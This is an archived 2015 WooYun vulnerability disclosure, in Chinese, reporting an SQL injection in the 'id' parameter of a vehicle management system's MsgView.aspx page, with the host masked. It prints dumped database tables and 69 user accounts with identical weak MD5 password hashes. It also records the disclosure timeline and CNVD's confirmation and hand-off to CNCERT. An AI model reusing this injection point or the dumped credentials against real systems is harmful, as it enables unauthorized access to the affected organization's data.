乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-10: 细节已通知厂商并且等待厂商处理中 2015-09-11: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-09-21: 细节向核心白帽子及相关领域专家公开 2015-10-01: 细节向普通白帽子公开 2015-10-11: 细节向实习白帽子公开 2015-10-26: 细节向公众公开
RT
SQL注入:**.**.**.**/KnowladgeCenter/MsgView.aspx?id=5
当前库
所有库
表
Database: vms[58 tables]+----------------------+| LocationHistorys || Locations || NewestLocations || Suppliers || Vehicle_admin_info || Vehicle_contact_info || VmsActiveVehicles || VmsApplyForms || VmsArea || VmsAreaApprove || VmsCompany || VmsDepartments || VmsDrivers || VmsFlowDefines || VmsFlowDetails || VmsFlows || VmsKnowledges || VmsMenus || VmsMobilePower || VmsMoblieMenu || VmsMonitorPower || VmsPoints || VmsProcessFlow || VmsProcessNode || VmsProcessTemplate || VmsRoads || VmsRoleInMenus || VmsRoles || VmsSystemConfig || VmsTasks || VmsUserInRoles || VmsUserSpecials || VmsUsers || VmsVehState || VmsVehicleTypes || VmsVehicles || VmsWatchs || accountToRole || account_info || baseStations || department || dispatch_info || employee_info || menu_info || repair_company || repair_cost || role_info || travel_cost || vehicle_DailyMlg || vehicle_accident || vehicle_change || vehicle_energy || vehicle_info || vehicle_items || vehicle_mil_logs || vehicle_mileage || vehicle_repair || vmsuserback |+----------------------+
字段
Database: vmsTable: VmsUsers[12 columns]+------------+---------+| Column | Type |+------------+---------+| CmpId | int || vcId | int || VuDpId | int || VuEmail | varchar || VuId | int || VuName | varchar || VuPassword | varchar || VuPhone | varchar || VuPY | varchar || VuRemark | varchar || VuTrueName | varchar || VuVrId | int |+------------+---------+
帐号信息
Database: vmsTable: VmsUsers[69 entries]+------+--------+----------------------------------+| VuId | VuName | VuPassword |+------+--------+----------------------------------+| 273 | system | C4CA4238A0B923820DCC509A6F75849B || 294 | zb | C4CA4238A0B923820DCC509A6F75849B || 295 | yly | C4CA4238A0B923820DCC509A6F75849B || 296 | wx | C4CA4238A0B923820DCC509A6F75849B || 297 | admin | C4CA4238A0B923820DCC509A6F75849B || 298 | wxf | C4CA4238A0B923820DCC509A6F75849B || 299 | zsy | C4CA4238A0B923820DCC509A6F75849B || 300 | wxj | C4CA4238A0B923820DCC509A6F75849B || 301 | lwx | C4CA4238A0B923820DCC509A6F75849B || 302 | lyq | C4CA4238A0B923820DCC509A6F75849B || 304 | sp | C4CA4238A0B923820DCC509A6F75849B || 305 | zz | C4CA4238A0B923820DCC509A6F75849B || 306 | tx | C4CA4238A0B923820DCC509A6F75849B || 307 | zzx | C4CA4238A0B923820DCC509A6F75849B || 308 | dl | C4CA4238A0B923820DCC509A6F75849B || 309 | xly | C4CA4238A0B923820DCC509A6F75849B || 311 | tm | C4CA4238A0B923820DCC509A6F75849B || 316 | lj | C4CA4238A0B923820DCC509A6F75849B || 317 | fgy | C4CA4238A0B923820DCC509A6F75849B || 318 | tym | C4CA4238A0B923820DCC509A6F75849B || 319 | ly | C4CA4238A0B923820DCC509A6F75849B || 320 | zx | C4CA4238A0B923820DCC509A6F75849B || 321 | lq | C4CA4238A0B923820DCC509A6F75849B || 322 | wln | C4CA4238A0B923820DCC509A6F75849B || 323 | chm | C4CA4238A0B923820DCC509A6F75849B || 324 | wgx | C4CA4238A0B923820DCC509A6F75849B || 325 | lyl | C4CA4238A0B923820DCC509A6F75849B || 326 | zlx | C4CA4238A0B923820DCC509A6F75849B || 327 | lm | C4CA4238A0B923820DCC509A6F75849B || 328 | ltf | C4CA4238A0B923820DCC509A6F75849B || 329 | cs | C4CA4238A0B923820DCC509A6F75849B || 330 | zyb | C4CA4238A0B923820DCC509A6F75849B || 331 | ljp | C4CA4238A0B923820DCC509A6F75849B || 332 | fh | C4CA4238A0B923820DCC509A6F75849B || 333 | hsm | C4CA4238A0B923820DCC509A6F75849B || 334 | fxd | C4CA4238A0B923820DCC509A6F75849B || 335 | lhf | C4CA4238A0B923820DCC509A6F75849B || 336 | zw | C4CA4238A0B923820DCC509A6F75849B || 338 | wg | C4CA4238A0B923820DCC509A6F75849B || 339 | shw | C4CA4238A0B923820DCC509A6F75849B || 340 | gqs | C4CA4238A0B923820DCC509A6F75849B || 341 | lxp | C4CA4238A0B923820DCC509A6F75849B || 342 | ljd | C4CA4238A0B923820DCC509A6F75849B || 343 | zxp | C4CA4238A0B923820DCC509A6F75849B || 344 | db | C4CA4238A0B923820DCC509A6F75849B || 345 | ysc | C4CA4238A0B923820DCC509A6F75849B || 346 | pxb | C4CA4238A0B923820DCC509A6F75849B || 347 | wyf | C4CA4238A0B923820DCC509A6F75849B || 348 | lyk | C4CA4238A0B923820DCC509A6F75849B || 349 | wyw | C4CA4238A0B923820DCC509A6F75849B || 350 | zwr | C4CA4238A0B923820DCC509A6F75849B || 351 | wg | C4CA4238A0B923820DCC509A6F75849B || 352 | fxy | C4CA4238A0B923820DCC509A6F75849B || 353 | zws | C4CA4238A0B923820DCC509A6F75849B || 354 | lp | C4CA4238A0B923820DCC509A6F75849B || 355 | wgm | C4CA4238A0B923820DCC509A6F75849B || 356 | slw | C4CA4238A0B923820DCC509A6F75849B || 357 | gq | C4CA4238A0B923820DCC509A6F75849B || 358 | yw | C4CA4238A0B923820DCC509A6F75849B || 359 | xc | C4CA4238A0B923820DCC509A6F75849B || 360 | gby | C4CA4238A0B923820DCC509A6F75849B || 361 | czj | C4CA4238A0B923820DCC509A6F75849B || 362 | sjl | C4CA4238A0B923820DCC509A6F75849B || 363 | gjs | C4CA4238A0B923820DCC509A6F75849B || 364 | lsz | C4CA4238A0B923820DCC509A6F75849B || 365 | wjb | C4CA4238A0B923820DCC509A6F75849B || 366 | hqs | C4CA4238A0B923820DCC509A6F75849B || 367 | yzc | C4CA4238A0B923820DCC509A6F75849B || 368 | jzy | C4CA4238A0B923820DCC509A6F75849B |+------+--------+----------------------------------+
过滤参数
危害等级:高
漏洞Rank:10
确认时间:2015-09-11 14:03
CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置.
暂无